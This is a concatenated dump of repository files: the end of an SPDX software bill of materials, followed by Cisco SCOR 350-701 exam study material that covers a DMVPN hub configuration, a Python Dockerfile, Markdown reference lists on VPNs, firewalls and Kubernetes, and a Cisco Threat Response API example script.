{ "SPDXID": "SPDXRef-File-88778c2b-3e43-fece-2e8d-e87672706ac6", "checksums": [ { "algorithm": "SHA256", "checksumValue": "369a2d0fc60383d8a03eac3464618d46868cefe89913a4ddf3822c0e69ebf7ff" } ], "fileName": "SQL-2005-Express.msi" }, { "SPDXID": "SPDXRef-File-70e06f6c-ea5d-4470-9ea6-43064533a00f", "checksums": [ { "algorithm": "SHA256", "checksumValue": "924a2321096a5d46146f007038960df62bd8b4455c17d5e081d4b852c7743899" } ], "fileName": "Windows-NET-Framework.exe" }, { "SPDXID": "SPDXRef-File-cd101e21-2058-4f30-47e1-3a00c665a26e", "checksums": [ { "algorithm": "SHA256", "checksumValue": "2617534e463dc57d91a92a075b507eea972e455193e83db25be480e5e1cc0e40" } ], "fileName": "java-8.3.1-re.exe" }, { "SPDXID": "SPDXRef-File-5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "checksums": [ { "algorithm": "SHA256", "checksumValue": "8c1f9ad48e6a91b648a3ff3cab2120eea966f6e84b6c0bc069fbafe2fbb77e5b" } ], "fileName": "apache-tomcat-8.5.69.zip" }, { "SPDXID": "SPDXRef-File-9c0531c5-2779-ddf0-4200-eb43fee967e9", "checksums": [ { "algorithm": "SHA256", "checksumValue": "66ad8bd2c06338b533b15f8171709407ad6aea24d87a5ae0d0eb3d37e78df9c9" } ], "fileName": "spring-instrument.jar" } ], "relationships": [ { "relatedSpdxElement": "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c", "relationshipType": "DESCRIBES", "spdxElementId": "SPDXRef-DOCUMENT" }, { "relatedSpdxElement": "NONE", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c" }, { "relatedSpdxElement": "SPDXRef-78a6e7eb-fd82-28bd-4451-dd953d62f30a", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c" }, { "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-78a6e7eb-fd82-28bd-4451-dd953d62f30a" }, { "relatedSpdxElement": "SPDXRef-5fd67cd3-12db-72b7-ae71-33aabfded828", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c" }, { "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-5fd67cd3-12db-72b7-ae71-33aabfded828" }, { "relatedSpdxElement": "SPDXRef-88778c2b-3e43-fece-2e8d-e87672706ac6", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c" }, { "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-88778c2b-3e43-fece-2e8d-e87672706ac6" }, { "relatedSpdxElement": "SPDXRef-70e06f6c-ea5d-4470-9ea6-43064533a00f", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-78a6e7eb-fd82-28bd-4451-dd953d62f30a" }, { "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-70e06f6c-ea5d-4470-9ea6-43064533a00f" }, { "relatedSpdxElement": "SPDXRef-cd101e21-2058-4f30-47e1-3a00c665a26e", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-a0bb435c-24c4-9dce-8d6d-1322fa07021c" }, { "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-cd101e21-2058-4f30-47e1-3a00c665a26e" }, { "relatedSpdxElement": "SPDXRef-5803cc4b-c10b-5c77-8e0e-f081c245f1c5", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-cd101e21-2058-4f30-47e1-3a00c665a26e" }, { "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-5803cc4b-c10b-5c77-8e0e-f081c245f1c5" }, { "relatedSpdxElement": "SPDXRef-9c0531c5-2779-ddf0-4200-eb43fee967e9", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-cd101e21-2058-4f30-47e1-3a00c665a26e" }, { "relatedSpdxElement": "NOASSERTION", "relationshipType": "CONTAINS", "spdxElementId": "SPDXRef-9c0531c5-2779-ddf0-4200-eb43fee967e9" } ] }
Text
h4cker/SCOR/DMVPN-hub-configuration.txt
crypto isakmp policy 1 encryption aes authentication pre-share group 14 ! ! A dynamic ISAKMP key and IPsec profile crypto isakmp key supersecretkey address 0.0.0.0 crypto ipsec transform-set trans2 esp-aes esp-sha-hmac mode transport ! crypto ipsec profile my_hub_vpn_profile set transform-set trans2 ! ! The tunnel interface with NHRP Interface Tunnel0 ip address 10.0.0.1 255.255.255.0 ip nhrp authentication anothersupersecretkey ip nhrp map multicast dynamic ip nhrp network-id 99 ip nhrp holdtime 300 tunnel source GigabitEthernet0/0 tunnel mode gre multipoint ! This line must match on all nodes that want to use this mGRE tunnel. tunnel key 100000 tunnel protection ipsec profile my_hub_vpn_profile ! interface GigabitEthernet0/0 ip address 172.16.0.1 255.255.255.0 ! interface GigabitEthernet0/1 ip address 192.168.0.1 255.255.255.0 ! router eigrp 1 network 10.0.0.0 0.0.0.255 network 192.168.0.0 0.0.0.255
h4cker/SCOR/Dockerfile_example
FROM alpine:3.10 # ensure local python is preferred over distribution python ENV PATH /usr/local/bin:$PATH # http://bugs.python.org/issue19846 # > At the moment, setting "LANG=C" on a Linux system *fundamentally breaks Python 3*, and that's not OK. ENV LANG C.UTF-8 # install ca-certificates so that HTTPS works consistently # other runtime dependencies for Python are installed later RUN apk add --no-cache ca-certificates ENV GPG_KEY E3FF2839C048B25C084DEBE9B26995E310250568 ENV PYTHON_VERSION 3.8.0 RUN set -ex \ && apk add --no-cache --virtual .fetch-deps \ gnupg \ tar \ xz \ \ && wget -O python.tar.xz "https://www.python.org/ftp/python/${PYTHON_VERSION%%[a-z]*}/Python-$PYTHON_VERSION.tar.xz" \ && wget -O python.tar.xz.asc "https://www.python.org/ftp/python/${PYTHON_VERSION%%[a-z]*}/Python-$PYTHON_VERSION.tar.xz.asc" \ && export GNUPGHOME="$(mktemp -d)" \ && gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPG_KEY" \ && gpg --batch --verify python.tar.xz.asc python.tar.xz \ && { command -v gpgconf > /dev/null && gpgconf --kill all || :; } \ && rm -rf "$GNUPGHOME" python.tar.xz.asc \ && mkdir -p /usr/src/python \ && tar -xJC /usr/src/python --strip-components=1 -f python.tar.xz \ && rm python.tar.xz \ \ && apk add --no-cache --virtual .build-deps \ bzip2-dev \ coreutils \ dpkg-dev dpkg \ expat-dev \ findutils \ gcc \ gdbm-dev \ libc-dev \ libffi-dev \ libnsl-dev \ libtirpc-dev \ linux-headers \ make \ ncurses-dev \ openssl-dev \ pax-utils \ readline-dev \ sqlite-dev \ tcl-dev \ tk \ tk-dev \ util-linux-dev \ xz-dev \ zlib-dev \ # add build deps before removing fetch deps in case there's overlap && apk del .fetch-deps \ \ && cd /usr/src/python \ && gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)" \ && ./configure \ --build="$gnuArch" \ --enable-loadable-sqlite-extensions \ --enable-optimizations \ --enable-shared \ --with-system-expat \ --with-system-ffi \ --without-ensurepip \ && make -j "$(nproc)" \ # set thread stack size to 1MB so we don't segfault before we hit sys.getrecursionlimit() # https://github.com/alpinelinux/aports/commit/2026e1259422d4e0cf92391ca2d3844356c649d0 EXTRA_CFLAGS="-DTHREAD_STACK_SIZE=0x100000" \ && make install \ \ && find /usr/local -type f -executable -not \( -name '*tkinter*' \) -exec scanelf --needed --nobanner --format '%n#p' '{}' ';' \ | tr ',' '\n' \ | sort -u \ | awk 'system("[ -e /usr/local/lib/" $1 " ]") == 0 { next } { print "so:" $1 }' \ | xargs -rt apk add --no-cache --virtual .python-rundeps \ && apk del .build-deps \ \ && find /usr/local -depth \ \( \ \( -type d -a \( -name test -o -name tests -o -name idle_test \) \) \ -o \ \( -type f -a \( -name '*.pyc' -o -name '*.pyo' \) \) \ \) -exec rm -rf '{}' + \ && rm -rf /usr/src/python \ \ && python3 --version # make some useful symlinks that are expected to exist RUN cd /usr/local/bin \ && ln -s idle3 idle \ && ln -s pydoc3 pydoc \ && ln -s python3 python \ && ln -s python3-config python-config # if this is called "PIP_VERSION", pip explodes with "ValueError: invalid truth value '<VERSION>'" ENV PYTHON_PIP_VERSION 19.3.1 # https://github.com/pypa/get-pip ENV PYTHON_GET_PIP_URL https://github.com/pypa/get-pip/raw/ffe826207a010164265d9cc807978e3604d18ca0/get-pip.py ENV PYTHON_GET_PIP_SHA256 b86f36cc4345ae87bfd4f10ef6b2dbfa7a872fbff70608a1e43944d283fd0eee RUN set -ex; \ \ wget -O get-pip.py "$PYTHON_GET_PIP_URL"; \ echo "$PYTHON_GET_PIP_SHA256 *get-pip.py" | sha256sum -c -; \ \ python get-pip.py \ --disable-pip-version-check \ --no-cache-dir \ "pip==$PYTHON_PIP_VERSION" \ ; \ pip --version; \ \ find /usr/local -depth \ \( \ \( -type d -a \( -name test -o -name tests -o -name idle_test \) \) \ -o \ \( -type f -a \( -name '*.pyc' -o -name '*.pyo' \) \) \ \) -exec rm -rf '{}' +; \ rm -f get-pip.py CMD ["python3"]
Markdown
h4cker/SCOR/FTD-clustering.md
# Additional Information about Cisco FTD Clustering - [Clustering Configuration and Deployment Guide](https://www.cisco.com/c/en/us/td/docs/security/firepower/623/configuration/guide/fpmc-config-guide-v623/firepower_threat_defense_cluster_for_the_fxos_chassis.html#ID-2170-000000a5) - [Cisco Live Presentation by Andrew Ossipov: NGFW Clustering Deep Dive - BRKSEC-3032](https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2019/pdf/BRKSEC-3032.pdf)
Markdown
h4cker/SCOR/GETVPN.md
# A Few GETVPN References - [Cisco Group Encrypted Transport VPN Configuration Guide](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_getvpn/configuration/xe-3s/sec-get-vpn-xe-3s-book/sec-get-vpn.html) - [GETVPN G-IKEv2](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_getvpn/configuration/xe-3s/sec-get-vpn-xe-3s-book/sec-get-vpn-gikev2.html) - [GETVPN White Paper](https://www.cisco.com/c/en/us/products/collateral/security/group-encrypted-transport-vpn/deployment_guide_c07-624088.html) - [GETVPN Design Guide](https://www.cisco.com/c/dam/en/us/products/collateral/security/group-encrypted-transport-vpn/GETVPN_DIG_version_2_0_External.pdf)
Markdown
h4cker/SCOR/IPSEC-VPNs.md
# Collection of Cisco IPsec VPN Example Configurations and Troubleshooting Guides ## IKEv2 and FlexVPN - [Configuring IKEv2 VRF aware SVTI](https://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-architecture-implementation/214938-configuring-ikev2-vrf-aware-svti.html) ## Cisco ASA IPsec VPN - [ASA IKEv2 RA VPN With Windows or Android VPN Clients and Certificate Authentication Configuration](https://www.cisco.com/c/en/us/support/docs/security/adaptive-security-appliance-asa-software/213246-asa-ikev2-ra-vpn-with-windows-7-or-andro.html) ## Troubleshooting Commands - [IPsec Troubleshooting: Understanding and Using debug Commands](https://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-negotiation-ike-protocols/5409-ipsec-debug-00.html) - [IPSec show commands Reference](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s3.html#wp3114534247) ## Additional GET VPN Resources - [GETVPN Deployment Guide ](https://www.cisco.com/c/en/us/products/collateral/security/group-encrypted-transport-vpn/deployment_guide_c07_554713.html) - [GETVPN Sample Configurations](https://www.cisco.com/c/en/us/products/collateral/security/group-encrypted-transport-vpn/deployment_guide_c07_554713.html)
Markdown
h4cker/SCOR/kubernetes.md
# Kubernetes Resources ## Getting Started with Kubernetes * [Kubernetes Community Overview and Contributions Guide](https://docs.google.com/presentation/d/1JqcALpsg07eH665ZXQrIvOcin6SzzsIUjMRRVivrZMg/edit?usp=sharing) by [Ihor Dvoretskyi](https://twitter.com/idvoretskyi/) * [Are you Ready to Manage your Infrastructure like Google?](http://blog.jetstack.io/blog/k8s-getting-started-part1/) * [Google is years ahead when it comes to the cloud, but it's happy the world is catching up](http://www.businessinsider.in/Google-is-years-ahead-when-it-comes-to-the-cloud-but-its-happy-the-world-is-catching-up/articleshow/47793327.cms) * [An Intro to Google’s Kubernetes and How to Use It](http://www.ctl.io/developers/blog/post/what-is-kubernetes-and-how-to-use-it/) by [Laura Frank](https://twitter.com/rhein_wein) * [Kubernetes: The Future of Cloud Hosting](https://github.com/meteorhacks/meteorhacks.github.io/blob/master/_posts/2015-04-22-learn-kubernetes-the-future-of-the-cloud.md) by [Meteorhacks](https://twitter.com/meteorhacks) * [Kubernetes by Google](http://thevirtualizationguy.wordpress.com/tag/kubernetes/) by [Gaston Pantana](https://twitter.com/GastonPantana) * [Key Concepts](http://blog.arungupta.me/key-concepts-kubernetes/) by [Arun Gupta](https://twitter.com/arungupta) * [Application Containers: Kubernetes and Docker from Scratch](http://keithtenzer.com/2015/06/01/application-containers-kubernetes-and-docker-from-scratch/) by [Keith Tenzer](https://twitter.com/keithtenzer) * [Learn the Kubernetes Key Concepts in 10 Minutes](http://omerio.com/2015/12/18/learn-the-kubernetes-key-concepts-in-10-minutes/) by [Omer Dawelbeit](https://twitter.com/omerio) * [Top Reasons Businesses Should Move to Kubernetes Now](http://supergiant.io/blog/top-reasons-businesses-should-move-to-kubernetes-now) by [Mike Johnston](https://github.com/gopherstein) * [The Children's Illustrated Guide to Kubernetes](https://kubernetes.io/blog/2016/06/illustrated-childrens-guide-to-kubernetes/) by [Deis](https://github.com/deis) * [The ‘kubectl run’ command](http://medium.com/@mhausenblas/the-kubectl-run-command-27c68de5cb76#.mlwi5an7o) by [Michael Hausenblas](https://twitter.com/mhausenblas) * [Docker Kubernetes Lab Handbook](https://github.com/xiaopeng163/docker-k8s-lab) by [Peng Xiao](https://twitter.com/xiaopeng163) * [Curated Resources for Kubernetes](https://hackr.io/tutorials/learn-kubernetes) * [Kubernetes Comic](https://cloud.google.com/kubernetes-engine/kubernetes-comic/) by [Google Cloud Platform](https://cloud.google.com/) * [Kubernetes 101: Pods, Nodes, Containers, and Clusters](https://medium.com/google-cloud/kubernetes-101-pods-nodes-containers-and-clusters-c1509e409e16) by [Dan Sanche](https://medium.com/@sanche) * [An Introduction to Kubernetes](http://www.digitalocean.com/community/tutorials/an-introduction-to-kubernetes) by [Justin Ellingwood](https://twitter.com/jmellingwood) * [Kubernetes and everything else - Introduction to Kubernetes and it's context](https://rinormaloku.com/introduction-application-architecture/) by [Rinor Maloku](https://twitter.com/rinormaloku) * [Installation on Centos 7](http://severalnines.com/blog/installing-kubernetes-cluster-minions-centos7-manage-pods-services) * [Setting Up a Kubernetes Cluster on Ubuntu 18.04](https://mherman.org/blog/2018/08/20/setting-up-a-kubernetes-cluster-on-ubuntu/) * [Cloud Native Landscape](https://landscape.cncf.io/) ## Interactive Kubernetes Examples in Katacoda * [Learn Kubernetes using Interactive Browser-Based Scenarios](https://www.katacoda.com/courses/kubernetes) * [Extending Kubernetes using Interactive Browser-Based Scenarios](https://www.katacoda.com/courses/extending-kubernetes) ## Installers * [Bootkube](https://github.com/kubernetes-incubator/bootkube) - CoreOS - Cloud Agnostic * [Breeze](https://github.com/wise2c-devops/breeze) - CentOS - Cloud Agnostic * [Conjure-up](https://github.com/conjure-up/conjure-up) - Ubuntu - Cloud Agnostic * [Docker for MAC](https://store.docker.com/editions/community/docker-ce-desktop-mac) - Run Kubernetes and Docker locally on your MAC (Edge Channel) * [Docker for Windows](https://store.docker.com/editions/community/docker-ce-desktop-windows) - Run Kubernetes and Docker locally on your Windows PC (Edge Channel) * [eksctl](https://eksctl.io/) - The official CLI for Amazon EKS * [Juju](https://jujucharms.com/canonical-kubernetes) - Ubuntu - Cloud Agnostic * [KubeSphere](https://github.com/kubesphere/kubesphere) - Install Kubernetes and KubeSphere in multiple instances in an easy way, including full-stack cloud-native softwares, e.g. istio, ES, Prometheus, Fluent Bit, SonarQube, Jenkins. * [k3s](https://github.com/rancher/k3s) - Lightweight Kubernetes. Easy to install, half the memory, all in a binary less than 40mb * [k3d](https://github.com/rancher/k3d) - A tool for running k3s clusters in container nodes * [kind](https://kind.sigs.k8s.io) - A tool for running local Kubernetes clusters using Docker container “nodes” * [Kops](https://github.com/kubernetes/kops) - OS Agnostic - AWS * [Kube-ansible](https://github.com/kairen/kube-ansible) - OS Agnostic - Cloud Agnostic * [Kube-aws](https://github.com/coreos/kube-aws) - CoreOS - AWS * [Kube-deploy](https://github.com/kubernetes/kube-deploy) * [Kubeadm](http://kubernetes.io/docs/admin/kubeadm/) - OS Agnostic - Cloud Agnostic * [KubeNow](https://github.com/kubenow/KubeNow) - Ubuntu - Cloud Agnostic * [Kubernetes-Saltstack](https://github.com/valentin2105/Kubernetes-Saltstack) - `systemd` OS - Cloud Agnostic * [Kubespray](https://github.com/kubernetes-incubator/kubespray) - OS Agnostic - Cloud Agnostic * [Kubicorn](https://github.com/kubicorn/kubicorn) - OS Agnostic - Cloud Agnostic * [Kublr](https://docs.kublr.com/quickstart/) - OS Agnostic - On-Prem - Cloud Agnostic * [Linode](https://developers.linode.com/kubernetes/) - CoreOS - Linode * [matchbox](https://github.com/coreos/matchbox) - CoreOS - Network boot and provision Container Linux clusters (e.g. etcd3, Kubernetes, more). * [MetalK8s](https://github.com/scality/metalk8s) - CentOS - On-Prem - Cloud Agnostic - [Apache-2.0](https://github.com/scality/metalk8s/blob/development/1.1/LICENSE) * [MicroK8s](https://github.com/ubuntu/microk8s) - A single package of k8s that installs on 42 flavours of Linux * [Minikube](https://github.com/kubernetes/minikube) - Run Kubernetes locally * [RKE](https://github.com/rancher/rke) - OS Agnostic - Cloud Agnostic * [sealos](https://github.com/fanux/sealos) - Simple kubernetes HA installer * [Simplekube](https://github.com/valentin2105/Simplekube) - `systemd` OS - Cloud Agnostic * [Supergiant](http://supergiant.io/) - CoreOS - Cloud Agnostic * [Terraform](https://github.com/kz8s/tack) - CoreOS - AWS * [Typhoon](https://typhoon.psdn.io/) - Container Linux - Cloud Agnostic * [aks-engine](https://github.com/Azure/aks-engine) - AKS Engine is the easiest way to provision a self-managed Kubernetes cluster on Azure. ## Official resources from the Kubernetes Team * [Kubernetes Documentation](https://kubernetes.io/docs/home/) * [Kubernetes Source](https://github.com/kubernetes/kubernetes/) * [Kubernetes Troubleshooting](https://kubernetes.io/docs/tasks/debug-application-cluster/troubleshooting/)
Markdown
h4cker/SCOR/learning_python_devnet.md
# Python and Programmability Tutorials and Labs in DevNet - [Coding & APIs Learning Path](https://developer.cisco.com/startnow/#coding-apis-v0) - [Security Programmability Learning Path](https://developer.cisco.com/startnow/#security-v0) - [Cisco SD-WAN APIs](https://developer.cisco.com/learning/tracks/sd-wan_programmability) - [ACI Programmability](https://developer.cisco.com/learning/tracks/aci-programmability) - [Introduction to Cisco DNA Center REST APIs](https://developer.cisco.com/learning/tracks/programming-dna)
Markdown
h4cker/SCOR/README.md
# Implementing and Operating Cisco Security Core Technologies (SCOR 350-701) This section is to document supplemental material for the Cisco Press **CCNP and CCIE Implementing and Operating Cisco Security Core Technologies (SCOR 350-701)** [official Cert Guide](https://learning.oreilly.com/library/view/ccnp-and-ccie/9780135971802/) and [Complete Video Course](https://learning.oreilly.com/videos/ccnp-and-ccie/9780136583417). The [SCOR 350-701 exam](https://www.cisco.com/c/en/us/training-events/training-certifications/training/training-services/courses/implementing-and-operating-cisco-security-core-technologies-scor.html) is the pre-requisite for the following Certifications: - CCNP Security - CCIE Security - Cisco Certified Specialist - Security Core
Python
h4cker/SCOR/threat-response-api-example.py
#!/usr/bin/python import requests, sys, json, copy, fileinput TR_SESSION = requests.session() def get_config(): global config config={} #options config['threat_response_token_file']='TR-token.txt' #credentials config['threat_response_api_client_id']="<INSERT YOUR API CLIENT ID HERE>" config['threat_response_api_client_pass']="<INSERT YOUR API CLIENT PASSWORD HERE>" #server (modify only to select region) config['threat_response_server']="visibility.amp.cisco.com" # EU - config['threat_response_server']="visibility.eu.amp.cisco.com # APJ - config['threat_response_server']="visibility.apjc.amp.cisco.com #paths (should not need to be modified) config['threat_response_api_root']="iroh/" config['threat_response_token_path']="oauth2/token" config['threat_response_inspect_path']="iroh-inspect/inspect" config['threat_response_deliberate_path']="iroh-enrich/deliberate/observables" config['threat_response_observe_path']="iroh-enrich/observe/observables" #make some useful variables now config['TRroot']='https://'+config['threat_response_server']+'/'+config['threat_response_api_root'] config['inspect_url'] = config['TRroot']+config['threat_response_inspect_path'] config['token_url']=config['TRroot']+config['threat_response_token_path'] config['deliberate_url'] = config['TRroot']+config['threat_response_deliberate_path'] config['observe_url'] = config['TRroot']+config['threat_response_observe_path'] return(config) def TR_generate_token(): ''' Generate a new access token and write it to disk''' headers = {'Content-Type':'application/x-www-form-urlencoded', 'Accept':'application/json'} payload = {'grant_type':'client_credentials'} response = requests.post(config['token_url'], headers=headers, auth=(config['threat_response_api_client_id'], config['threat_response_api_client_pass']), data=payload) if TR_unauthorized(response): sys.exit('Unable to generate new token!\nCheck your CLIENT_ID and CLIENT_PASSWORD') response_json = response.json() access_token = response_json['access_token'] with open(config['threat_response_token_file'], 'w') as token_file: token_file.write(access_token) return(access_token) def TR_get_token(): ''' Get the access token from disk, or from auth API ''' for i in range(2): while True: try: with open(config['threat_response_token_file'], 'r') as token_file: access_token = token_file.read() return access_token except FileNotFoundError: return TR_generate_token() break def TR_unauthorized(response): ''' Check the status code of the response ''' if response.status_code == 401: return True return False def TR_check_auth(function, param): ''' Query the API and validate authentication was successful If authentication fails, generate a new token and try again ''' response = function(param) if TR_unauthorized(response): print('Auth failed, generating new token.') config['access_token']=TR_generate_token() return function(param) return response def TR_query(text_block): ''' Pass the functions and parameters to check_auth to query the API Return the final response ''' response = TR_check_auth(TR_inspect, text_block) inspect_output = response.text response = TR_check_auth(TR_enrich, inspect_output) # TR_enrich() is undefined return response def TR_inspect(text_block): '''Inspect the provided text block and extract observables ''' headers = {'Authorization':'Bearer {}'.format(config['access_token']), 'Content-Type':'application/json', 'Accept':'application/json'} inspect_payload = {'content':text_block} inspect_payload = json.dumps(inspect_payload) response = TR_SESSION.post(config['inspect_url'], headers=headers, data=inspect_payload) return response def TR_deliberate(observables): ''' Query the deliberate API for observable(s) ''' headers = {'Authorization':'Bearer {}'.format(config['access_token']), 'Content-Type':'application/json', 'Accept':'application/json'} response = TR_SESSION.post(config['deliberate_url'], headers=headers, data=json.dumps(observables)) return response def TR_observe(observables): ''' Query the deliberate API for observable(s) ''' headers = {'Authorization':'Bearer {}'.format(config['access_token']), 'Content-Type':'application/json', 'Accept':'application/json'} response = TR_SESSION.post(config['observe_url'], headers=headers, data=json.dumps(observables)) return response def uniq_observables(observables): uniqd=[] for obs in observables: if obs not in uniqd: uniqd.append(obs) return(uniqd) def filter_cleans(results): cleans = [] #init list of observables with any clean verdict for obs in results: #loop through observables if 'verdicts' in obs: #if it has verdicts for verdict in obs['verdicts']: #loop through verdicts if verdict['verdict'] == "Clean": #if this one is clean cleans.append(obs) # add the observable to list of cleans break #and exit, since it takes only one 'clean' and we found one for obs in cleans: #go through our list results.remove(obs) #and for each entry, remove it from the initial dataset return(results) #return what's left def main(): #collect settings dict get_config() # get the token to use to start config['access_token']=TR_get_token() # process input # init some vars [text_chunk,observables, judgements, sightings]=['',[],[],[]] line_idx=0 #chunking loop for line in fileinput.input(): line_idx=line_idx+1 text_chunk=text_chunk+line if len(text_chunk) > 2000: #if we hit the 2000 char max guideline, send the chunk for inspection these_observables = json.loads(TR_check_auth(TR_inspect,text_chunk).text) #append results to existing data observables=observables+these_observables # clear the chunk for reuse text_chunk='' #if we're here, we ran out of lines #inspect the last chunk if it has content if text_chunk != '': these_observables = json.loads(TR_check_auth(TR_inspect,text_chunk).text) #append results to existing data observables=observables+these_observables #uniq our observables observables= uniq_observables(observables) if len(observables) >50: # semi-arbitrary limit for performance reasons. # This is a cop-out. We could break the enrichment process into segments the same way we did the Inspection process # for this example, we'll keep it simple. sys.exit('NOT doing enrichment! {} is too many observables. Break that input up.'.format(len(observables))) # init results data structure results = copy.deepcopy(observables) # Deliberate deliberations=json.loads(TR_check_auth(TR_deliberate,observables).text) for module_results in deliberations['data']: #add deliberations to results if 'verdicts' in module_results['data']: for verdict in module_results['data']['verdicts']['docs']: #loop through the verdicts in this module's output try: for obs in results: #loop through our list of observables if obs['value'] == verdict['observable']['value'] and obs['type'] == verdict['observable']['type']: #if this observable is the same as the one for the current verdict this_verdict= {'module_name': module_results['module'], 'verdict': verdict['disposition_name'] } if 'verdicts' not in obs: #if this is the first verdict on this observable, obs['verdicts']=[] # then make a new blank list of verdicts obs['verdicts'].append(this_verdict) break except Exception as e: print('{}:{}'.format(str(e)), json.dumps(obs, indent=4)) #filter out anything with any "Clean" verdict results=filter_cleans(results) # Observe observations=json.loads(TR_check_auth(TR_observe,observables).text)#make the observe API call for observation in observations['data']:#parse the results one observation at a time; actually each module's output at a time if 'sightings' in observation['data']:#if it had any sightings for sighting in observation['data']['sightings']['docs']:#go through those sightings if 'targets' in sighting: # we are only interested in sightings with targets for sighted_observable in sighting['observables']:#for each observable that was sighted for obs in results:# look at each observable in our initial list if obs['value'] == sighted_observable['value'] and obs['type'] == sighted_observable['type']: #if this observable is the same as the one for the current verdict this_sighting= {'module_name': sighting['source'], 'sighting_count': sighting['count']} #create a new data element in our results set for this sighting if 'sightings' not in obs: #if this is the first sighting on this observable, obs['sightings']=[] # then make a new blank list of sightings obs['sightings'].append(this_sighting) # add this sighting to the list for this observable break #found our match in a uniq'd list; no need to continue #summarizing/aggregating for item in results: #aggregate verdicts item['verdicts_count']=0 #init counter item['verdicts_module_list']=[] #init list of modules if 'verdicts' in item: #if there are verdicts for verdict in item['verdicts']: #for each one item['verdicts_count']=item['verdicts_count']+1 #increment counter item['verdicts_module_list'].append(verdict['module_name']) #add modulename to list item['verdicts_module_list']=list(set(item['verdicts_module_list'])) #when done, uniq list of modules #aggregate sightings item['sightings_count']=0#init counter item['sightings_module_list']=[]#init list of modules if 'sightings' in item: #if there are sightings for sighting in item['sightings']:#for each one item['sightings_count']=item['sightings_count']+sighting['sighting_count']#increment counter item['sightings_module_list'].append(sighting['module_name'])#add modulename to list item['sightings_module_list']=list(set(item['sightings_module_list']))#when done, uniq list of modules #filter out unseen observables results[:]= [item for item in results if item['sightings_count'] > 0] #make new list using only elements where there is at least one sighting if len(results)>0: #if there are 1+ entries left in the list of results print('the following observables were found in the input and were seen in your environment:') url='https://{}/#/investigate?q='.format(config['threat_response_server'])#init url for item in results: #for each remaining observable print('{} ({}): {} sightings, {} verdicts'.format(item['value'],item['type'],item['sightings_count'],item['verdicts_count'])) #print the sumamry information url=url+'{}%3A{}%0A'.format(item['type'], item['value']) #and add it to the CTR URL for an investigation print('To get more information and investigate these observables in Threat Response, go to the following location:') print(url) if __name__ == '__main__': main()
Markdown
h4cker/SCOR/VPN-Troubleshooting.md
# Remote Access and Site-to-site VPN Troubleshooting References - [ASA and AnyConnect Troubleshooting TechNotes](https://www.cisco.com/c/en/us/support/security/asa-5500-series-next-generation-firewalls/products-tech-notes-list.html) - [AnyConnect VPN Client Troubleshooting Guide](https://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-firewalls/212972-anyconnect-vpn-client-troubleshooting-gu.html) - [Site-to-Site VPNs for Firepower Threat Defense ](https://www.cisco.com/c/en/us/td/docs/security/firepower/650/configuration/guide/fpmc-config-guide-v65/firepower_threat_defense_site_to_site_vpns.html) - [Remote Access VPNs for Firepower Threat Defense](https://www.cisco.com/c/en/us/td/docs/security/firepower/650/configuration/guide/fpmc-config-guide-v65/firepower_threat_defense_remote_access_vpns.html) - [VPN Monitoring for Firepower Threat Defense](https://www.cisco.com/c/en/us/td/docs/security/firepower/650/configuration/guide/fpmc-config-guide-v65/firepower_threat_defense_vpn_monitoring.html) - [VPN Troubleshooting for Firepower Threat Defense](https://www.cisco.com/c/en/us/td/docs/security/firepower/650/configuration/guide/fpmc-config-guide-v65/firepower_threat_defense_vpn_troubleshooting.html)
Markdown
h4cker/SCOR/zbfw.md
# Tips and Resources about Zone-based Firewalls ## Deployment and Configuration Guides - [Security Configuration Guide: Zone-Based Policy Firewall](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_data_zbf/configuration/15-mt/sec-data-zbf-15-mt-book/sec-zone-pol-fw.html) - [Zone-Based Policy Firewall Design and Application Guide](https://www.cisco.com/c/en/us/support/docs/security/ios-firewall/98628-zone-design-guide.html) - [Configuring ZBFW from GeeksforGeeks](https://www.geeksforgeeks.org/zone-based-firewall/) ## Rules For Applying Zone-Based Policy Firewall - Router network interfaces’ membership in zones is subject to several rules that govern interface behavior, as is the traffic moving between zone member interfaces: - A zone must be configured before interfaces can be assigned to the zone. - An interface can be assigned to only one security zone. - All traffic to and from a given interface is implicitly blocked when the interface is assigned to a zone, except traffic to and from other interfaces in the same zone, and traffic to any interface on the router. - Traffic is implicitly allowed to flow by default among interfaces that are members of the same zone. - In order to permit traffic to and from a zone member interface, a policy allowing or inspecting traffic must be configured between that zone and any other zone. - The self zone is the only exception to the default deny all policy. All traffic to any router interface is allowed until traffic is explicitly denied. - Traffic cannot flow between a zone member interface and any interface that is not a zone member. Pass, inspect, and drop actions can only be applied between two zones. - Interfaces that have not been assigned to a zone function as classical router ports and might still use classical stateful inspection/CBAC configuration. - If it is required that an interface on the box not be part of the zoning/firewall policy. It might still be necessary to put that interface in a zone and configure a pass all policy (sort of a dummy policy) between that zone and any other 